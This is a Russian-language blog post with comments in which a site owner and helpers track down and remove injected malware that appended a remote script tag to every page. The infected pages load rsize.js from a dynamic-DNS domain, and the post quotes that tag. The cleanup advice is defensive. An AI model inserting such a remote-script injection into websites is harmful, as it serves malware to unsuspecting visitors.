На сайте заметил вредоносный код, но не знаю, в каком файле удалять...

Блог им. Trimbombom
На сайте есть вредоносный код, но не знаю, в каком файле удалять…

Служба поддержки Касперского (по моему запросу, т.к. сам найти не смог) прислала сообщение, что у меня вредоносный код:

Следующий код является вредоносным:

</хтмл><скрипт src=«newdomme.changeip.name/rsize.js»></скрипт >

Если загрузить сайт newsstreet.ru в мозилле и нажать ctrl+U, то он виден в самом низу страницы. Но я не знаю, где на сервере ковырять, какой файл и в какой папке, чтобы его удалить.

Вообще код стоит сразу после тега </боди>, а именно после него идёт

</хтмл><скрипт src=«newdomme.changeip.name/rsize.js»></скрипт > — это конец страницы.

Подскажите, пожалуйста, где ковырять…

Заранее благодарю!

31 комментарий

avatar
index.php
avatar
Там этого кода нет, уже смотрел…
avatar
В файле \templates\skin\_Ваш_скин_\block.blogs.tpl тоже не нашёл этот код.
avatar
тогда в хуках надо смотреть, например, хук копирайтов.
Да вообще не вижу проблемы, пройтись тотал коммандером по alt+F7
avatar
А в какой папке хук копирайтов и можно ли пройтись также файлзиллой, по аналогии с тотак коммандер?
avatar
Если копирайты — это файл footer.tpl, то там тоже ничего нет.
avatar
Тотал коммандер поставил, но он вроде как не может искать файлы на сервере через ftp…
avatar
скопировать шаблон и найти.

footer.tpl просмотреть и папку хуков движка + вспомнить кто имел доступ к серверу.
avatar
В этом файле этого кода нет.

Я сделал также следующее — скачал весь сайт на комп и прогнал поиском в тотал коммандере с помощью alt+F7 — искал файлы с текстом кода или его частями — ничего нет…

Написал письмо хостеру — жду ответа… может это только он может код удалить…
avatar
скачайте весь движок на пк и ищите по всему сайту
avatar
Сделал — ничего не нашёл… :(
avatar
Хостер пишет, что проблема не у них, а у меня на сайте… вообщем не вижу пока выхода… разве только сделать откат попробовать…
avatar
по всем файлам искали? часть кода искали? попробуйте поискать по однозначному представлению части кода — без пробелов, если не найдете, значит где-то зашили в base64 ссылку
avatar
А как попасть в base64 и проверить?

Я вот сейчас понял, что тотал коммандер не может априори все найти, поскольку у файлов разные расширения, многие он просто не может прочитать видимо, так что нужен какой-то другой поиск…
avatar
Я не по всем файлам искал, а вообще сразу по всей папке ливстрит запустил поиск…
avatar
alt+f7, искать файлы: *.* или оставить пустым.
с тектом: введите часть искомого кода, в котором нет пробелов. например, «newdomme.changeip.name/rsize.js»
avatar
Делал именно так для некоторых папок и всего сайта. Видимо некоторые файлы тотал коммандер не читает, т.к. поисал довольно быстро — несколько секунд на весь сайт и ничего не нашел.
avatar
перезалейте файлы движка, оставьте плагины, шаблон и конфиг. будете знать хотя бы где-то.
avatar
ВОт здесь прочитал о возможном решении: www.komtet.ru/lib/tech/udalenie-inekcii-eval-iz-php-skriptov

но не знаю, как выполнить консольную команду…
avatar
так просто поищите на строки «base64_decode» и «eval». Последнее один раз присутствует в ядре (Engine.class.php).
avatar
Я наверное совсем тупой… вобщем нашел я упоминания «base64_decode» в нескольких файлах, но там нет «newdomme.changeip.name/rsize.js»… не понимаю, что делать дальше.
avatar
Кажется решил вопрос — нашёл, что в файлах /httpdocs/classes/actions два файла ActionBlog.class.php и ActionProfile.class.php содержат base64_decode, а оригиналы в дистрибутиве — не содержат.

Скопировал код из дистрибутива в эти файлы на сервере — вредоносный код исчез.

Остались в директории /private/02_06_2011/classes/actions файлы с тем же названием, они содержат код «base64_decode», но, поскольку в дистрибутиве этих файлов нет, то не знаю, на что менять.

Они случаем не должны быть идентичны тем, что в директории /httpdocs/classes/actions?
avatar
пароли на фтп/админку/панель упр. поменяйте.
avatar
но там нет «newdomme.changeip.name/rsize.js»… не понимаю, что делать дальше.
и не будет т.к. зашифровано.
нашёл, что в файлах /httpdocs/classes/actions два файла ActionBlog.class.php и ActionProfile.class.php содержат base64_decode, а оригиналы в дистрибутиве — не содержат.
вот и там этого и не должно быть. сохранили бы файлы для публичного анализа…
Остались в директории /private/02_06_2011/classes/actions файлы с тем же названием, они содержат код «base64_decode», но, поскольку в дистрибутиве этих файлов нет, то не знаю, на что менять.
можете их опубликовать в архиве дабы посмотреть что там такое и удалить с сервера.
avatar
Как опубликовать здесь в архиве — не знаю, поэтому загрузил на сервер:

Заражённые (или один из них) ActionBlog.class.php и ActionProfile.class.php из директории /httpdocs/classes/actions

Заражённые? ActionBlog.class.php и ActionProfile.class.php из директории /private/02_06_2011/classes/actions
avatar
Только вот в чем штука — у меня теперь комп. должен быть заражён, а cureit ничего не находит…
avatar
это чистые файлы.
avatar
Я сделал так — просто взял текст из аналогичных файлов дистрибутива и вставил его в аналогичные файлы на сервере, предварительно удалив содержание файлов на сервере. После этого вредоносный код исчез.
avatar
Ну я ссылки я привел на файлы, которые были взяты с сервера, заражённые…
avatar
ВОт здесь прочитал о возможном решении: www.komtet.ru/lib/tech/udalenie-inekcii-eval-iz-php-skriptov

но не знаю, как выполнить консольную команду…

Данный способ доступен только при наличии ssh доступа для вашего тарифного плана виртуального хостинга.
avatar
То же самое и у меня — этот скрипт прописывался внизу страницы после тэга . Сравнил файлы index.php на сайте и в дистрибутиве и обнаружил лишний код в index.php на сайте. Заменил его на хостинге чистым index.php из дистрибутива, который скачал с Wordpress.org, сделав предварительно копию. Вредоносный код исчез и все как будто работает. Надо бы еще сменить пароль для входа на сайт…
Только зарегистрированные и авторизованные пользователи могут оставлять комментарии.